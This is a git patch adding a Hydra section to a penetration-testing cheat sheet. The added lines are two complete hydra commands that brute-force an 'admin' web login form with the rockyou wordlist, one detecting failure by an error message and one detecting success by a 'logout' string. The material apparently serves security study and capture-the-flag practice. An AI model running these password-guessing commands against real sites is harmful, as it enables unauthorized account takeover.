From 29cba23b58519f5dfd7da5e1c11b0de5a08ec919 Mon Sep 17 00:00:00 2001
From: ARZ <60057481+AbdullahRizwan101@users.noreply.github.com>
Date: Tue, 13 Apr 2021 17:39:40 +0500
Subject: [PATCH] Update Cheat Sheet.md

---
 Cheat Sheet.md | 12 ++++++++++++
 1 file changed, 12 insertions(+)

diff --git a/Cheat Sheet.md b/Cheat Sheet.md
index 58b05cd..352d332 100644
--- a/Cheat Sheet.md	
+++ b/Cheat Sheet.md	
@@ -470,6 +470,18 @@ To get a RCE
 * using `crackstation`
 * using `seclists`
 
+### Hydra 
+
+When the login shows an error message<br/> 
+
+`hydra -l admin -P /usr/share/wordlists/rockyou.txt <ip> http-post-form '/login.php:username=^USE
+R^&password=^PASS^:F=Incorrect!' -t 64 -V -I`
+
+
+When the login doesn't show an error message so we can specify a `success (s)` string which is shown after we login to a site , typically logout is shown to us.<br/>
+`hydra -l admin -P /usr/share/wordlists/rockyou.txt <ip> http-post-form '/login.php:username=^USE
+R^&password=^PASS^:S=logout' -t 64 -V -I`
+
 # Hash Cracking 
 
 ### Hashcat